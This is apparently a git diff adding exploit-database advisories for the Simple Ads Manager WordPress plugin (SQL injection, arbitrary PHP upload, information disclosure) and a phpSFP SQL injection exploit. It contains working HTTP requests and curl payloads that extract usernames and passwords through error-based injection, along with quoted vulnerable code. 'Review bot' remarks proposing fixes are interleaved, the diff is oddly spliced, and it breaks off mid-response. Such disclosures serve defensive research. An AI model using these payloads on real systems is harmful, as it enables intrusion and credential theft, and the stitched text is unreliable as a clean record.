+ 'sql' => $sql,
+ 'hits' => $hits,
+ 'values' => $values
+ ));
+ }
+ break;
+
+
+
+
+---SQL INJECTION 2---
++REQUEST
+POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
+Host: hostname
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+
+action=load_posts&cstr=&sp=Post&spg=Page
+
++ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
++ Vulnerable code:
+case 'sam_ajax_load_posts':
+ $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
+ $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post';
+ $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page';
+
+ //set @row_num = 0;
+ //SELECT @row_num := @row_num + 1 AS recid
+ $sql = "SELECT
+ wp.id,
+ wp.post_title AS title,
+ wp.post_type AS type
+ FROM
+ $postTable wp
+ WHERE
+ wp.post_status = 'publish' AND
+ FIND_IN_SET(wp.post_type, 'post,page{$custs}')
+ ORDER BY wp.id;";
+
+ $posts = $wpdb->get_results($sql, ARRAY_A);
+
+ $k = 0;
+ foreach($posts as &$val) {
+ switch($val['type']) {
+ case 'post':
+ $val['type'] = $sPost;
+ break;
+ case 'page':
+ $val['type'] = $sPage;
+ break;
+ default:
+ $val['type'] = $sPost .
': '.$val['type'];
+ break;
+ }
+ $k++;
+ $val['recid'] = $k;
+ }
+ $out = array(
+ 'status' => 'success',
+ 'total' => count($posts),
+ 'records' => $posts
+ );
+ break;
+
+
+
+---SQL INJECTION 3---
++REQUEST:
+
+POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm= HTTP/1.1
+Host: hostname
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmb=30068390.1.10.1427794022; __utmc=30068390
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 22
+
+action=load_combo_data
+
++ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
++Vulnerable code: from line 225 to 255
+ case 'sam_ajax_load_combo_data':
+ $page = $_GET['page'];
+ $rows = $_GET['rows'];
+ $searchTerm = $_GET['searchTerm'];
+ $offset = ((int)$page - 1) * (int)$rows;
+ $sql = "SELECT
+ wu.id,
+ wu.display_name AS title,
+ wu.user_nicename AS slug,
+ wu.user_email AS email
+ FROM
+ $uTable wu
+ WHERE wu.user_nicename LIKE '{$searchTerm}%'
+ ORDER BY wu.id
+ LIMIT $offset, $rows;";
+ $users = $wpdb->get_results($sql, ARRAY_A);
+ $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%';";
+ $rTotal = $wpdb->get_var($sql);
+ $total = ceil((int)$rTotal/(int)$rows);
+ $out = array(
+ 'page' => $page,
+ 'records' => count($users),
+ 'rows' => $users,
+ 'total' => $total,
+
'offset' => $offset
+ );
+ break;
+
+
+
+
+---SQL INJECTION 4---
+
++ REQUEST
+
+POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
+Host: hostname
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmc=30068390
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 73
+
+action=load_users&subscriber=&contributor=&author=&editor=&admin=&sadmin=
+
++ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+
++ Vulnerable code: from line 188 to 223
+ case 'sam_ajax_load_users':
+ $roleSubscriber = (isset($_REQUEST['subscriber'])) ? urldecode($_REQUEST['subscriber']) : 'Subscriber';
+ $roleContributor = (isset($_REQUEST['contributor'])) ? urldecode($_REQUEST['contributor']) : 'Contributor';
+ $roleAuthor = (isset($_REQUEST['author'])) ? urldecode($_REQUEST['author']) : 'Author';
+ $roleEditor = (isset($_REQUEST['editor'])) ? urldecode($_REQUEST['editor']) : 'Editor';
+ $roleAdministrator = (isset($_REQUEST["admin"])) ? urldecode($_REQUEST["admin"]) : 'Administrator';
+ $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ?
urldecode($_REQUEST['sadmin']) : 'Super Admin';
+ $sql = "SELECT
+ wu.id,
+ wu.display_name AS title,
+ wu.user_nicename AS slug,
+ (CASE wum.meta_value
+ WHEN 0 THEN '$roleSubscriber'
+ WHEN 1 THEN '$roleContributor'
+ WHEN 2 THEN '$roleAuthor'
+ ELSE
+ IF(wum.meta_value > 2 AND wum.meta_value <= 7, '$roleEditor',
+ IF(wum.meta_value > 7 AND wum.meta_value <= 10, '$roleAdministrator',
+ IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)
+ )
+ )
+ END) AS role
+ FROM $uTable wu
+ INNER JOIN $umTable wum
+ ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'
+ ORDER BY wu.id;";
+ $users = $wpdb->get_results($sql, ARRAY_A);
+ $k = 0;
+ foreach($users as &$val) {
+ $k++;
+ $val['recid'] = $k;
+ }
+ $out = $users;
+ break;
diff --git a/platforms/php/webapps/36614.txt b/platforms/php/webapps/36614.txt
new file mode 100755
index 000000000..dfa996073
--- /dev/null
+++ b/platforms/php/webapps/36614.txt
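Review bot: All four quoted handlers place request values directly into the SQL string (`$hit[0]`/`$hit[1]`, `$custs`, `$searchTerm` and the uncast `$rows` in `LIMIT $offset, $rows`, and the six role labels), but the entry records neither a fixed plugin version nor a remediation. A closing line would make it usable for triage, such as `+ Fix: build each query with $wpdb->prepare() placeholders, cast hit ids, page and rows to int, and escape the LIKE term with $wpdb->esc_like()`. The `sam_hits` branch also returns the executed statement to the caller in the `'sql'` field of its JSON reply on both the success and the failure path, which deserves its own hardening note. The excerpts are partial `case` branches, so whether a capability or nonce check runs before the switch cannot be seen here.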
@@ -0,0 +1,51 @@
+#Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File Upload
+#Product: Wordpress plugin Simple Ads Manager
+#Vendor: https://profiles.wordpress.org/minimus/
+#Affected version: Simple Ads Manager 2.5.94
+#Download link: https://wordpress.org/plugins/simple-ads-manager/
+#CVE ID: CVE-2015-2825
+#Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team
+
+
+::PROOF OF CONCEPT::
+
++ REQUEST
+POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
+Host: targer.com
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Content-Type: multipart/form-data; boundary=---------------------------108989518220095255551617421026
+Content-Length: 683
+
+-----------------------------108989518220095255551617421026
+Content-Disposition: form-data; name="uploadfile"; filename="info.php"
+Content-Type: application/x-php
+
+
+-----------------------------108989518220095255551617421026
+Content-Disposition: form-data; name="action"
+
+upload_ad_image
+-----------------------------108989518220095255551617421026—
+
+
++ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+
++ Vulnerable code: from line 303 to 314
+
+ case 'sam_ajax_upload_ad_image':
+ if(isset($_POST['path'])) {
+ $uploadDir = $_POST['path'];
+ $file = $uploadDir . basename($_FILES['uploadfile']['name']);
+
+ if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file )) {
+ $out = array('status' => "success");
+ } else {
+ $out = array('status' => "error");
+ }
+ }
+ break;
+
+
++ REFERENCE:
+- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en
+- https://www.youtube.com/watch?v=8IU9EtUTkxI
\ No newline at end of file
diff --git a/platforms/php/webapps/36615.txt b/platforms/php/webapps/36615.txt
new file mode 100755
index 000000000..364a9fc03
--- /dev/null
+++ b/platforms/php/webapps/36615.txt
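Review bot: The quoted `sam_ajax_upload_ad_image` branch takes the destination directory from `$_POST['path']` and keeps the client-supplied file name after only `basename()`, with no extension or type check visible, yet the entry stops at the listing and gives no fix or fixed version. I would add a remediation line, e.g. `+ Fix: ignore client-supplied paths, store uploads through wp_handle_upload() with an image-only MIME allow-list, and require current_user_can() plus check_ajax_referer()`. The sample request also has `Host: targer.com`, which looks like a typo for the `target.com` used in the sibling entries. The branch is an excerpt, so any checks that run before the switch are not visible here.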
@@ -0,0 +1,27 @@
+#Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure
+#Product: Wordpress plugin Simple Ads Manager
+#Vendor: https://profiles.wordpress.org/minimus/
+#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
+#Download link: https://wordpress.org/plugins/simple-ads-manager/
+#CVE ID: CVE-2015-2826
+#Author: Nguyen Hung Tuan (tuan.h.nguyen@itas.vn) & ITAS Team
+
+
+::PROOF OF CONCEPT::
+
++ REQUEST
+POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
+Host: target.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 17
+
+action=load_users
+
+
+
++ Function list: load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats,...
++ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
++ Image: http://www.itas.vn/uploads/newsother/disclosure.png
+
++ REFERENCE:
+- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en
\ No newline at end of file
diff --git a/platforms/php/webapps/36616.txt b/platforms/php/webapps/36616.txt
new file mode 100755
index 000000000..8d1fbb3dc
--- /dev/null
+++ b/platforms/php/webapps/36616.txt
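Review bot: The entry never says what is disclosed or to whom: it shows a request with no Cookie header and a function list that ends in `...`, but does not state that the handlers answer without authentication or which records each one returns. A short impact line would close that gap, e.g. `+ Impact: sam-ajax-admin.php actions return user, post and statistics records to callers without a logged-in session (confirm per action)`. That wording is inferred from the request shown and should be verified before it is added. The function list should be written out in full so it can be used for log searches against `sam-ajax-admin.php`. The REFERENCE title mentions Hakin9 IT Security Magazine rather than this plugin, so the link is worth double-checking.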
@@ -0,0 +1,120 @@ +###################################################################### +# _ ___ _ _ ____ ____ _ _____ +# | | / _ \| \ | |/ ___|/ ___| / \|_ _| +# | | | | | | \| | | _| | / _ \ | | +# | |__| |_| | |\ | |_| | |___ / ___ \| | +# |_____\___/|_| \_|\____|\____/_/ \_\_| +# +# phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection (0-day) +# Website : http://codecanyon.net/item/phpsfp-schedule-facebook-posts/5177393 +# Exploit Author : @u0x (Pichaya Morimoto) +# Release dates : April 2, 2015 +# +# Special Thanks to 2600 Thailand group: +# xelenonz, pe3z, anidear, windows98se, icheernoom, penguinarmy +# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ +# +######################################################################## + +[+] Description +============================================================ +phpSFP – is a Platform where you can easily manage your scheduling for +all your (Facebook) pages & groups in one place. +It helps to send messages, ads, events, news and so on. phpSFP is +pretty popular more than its sale record thanks to nulled group +(underground WebApp license crackers). + +[+] Background <3 +============================================================ +I managed to track down a group of Vietnam-based Facebook spammer +which posted ads on many FB groups I'm joined. +And ended up with a website that is modified version (all phpSFP +credits are removed) of phpSFP 1.4.1. +so I did some matching and found the original application is phpSFP. + +Guess what happens when spammer mess up with offsec guy ;) + +[+] Exploit +============================================================ +There are many possible ways to do SQLi, I will go with error-based +which enabled by default on phpSFP xD + +$ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or +extractvalue(rand(),concat(0x2e,user())) or '1|||1" + +in case you don't know, for further queries you have to change +'user()' to something else, e.g. 
+ +$ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or +extractvalue(rand(),concat(0x2e,(select +concat_ws(0x3a,username,password) from users limit 1))) or '1|||2" + +don't forgot to do length()/substr() stuffs due to limitation of 32 +characters in error message + + +[+] Proof-of-Concept +============================================================ +PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 + +GET /index.php/login HTTP/1.1 +Host: 192.168.33.103 +Proxy-Connection: keep-alive +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Cookie: login=1|||1' or extractvalue(rand(),concat(0x2e,(select +concat_ws(0x3a,username,password) from users limit 1))) or '1|||2 + +HTTP/1.1 500 Internal Server Error +Server: Apache/2.4.7 (Ubuntu) +Date: Thu, 02 Apr 2015 13:15:08 GMT +Content-Type: text/html; charset=UTF-8 +Connection: keep-alive +Set-Cookie: ci_session=; expires=Sat, 01-Apr-2017 13:15:08 +GMT; Max-Age=63072000; path=/ +Content-Length: 838 + + + +Database Error +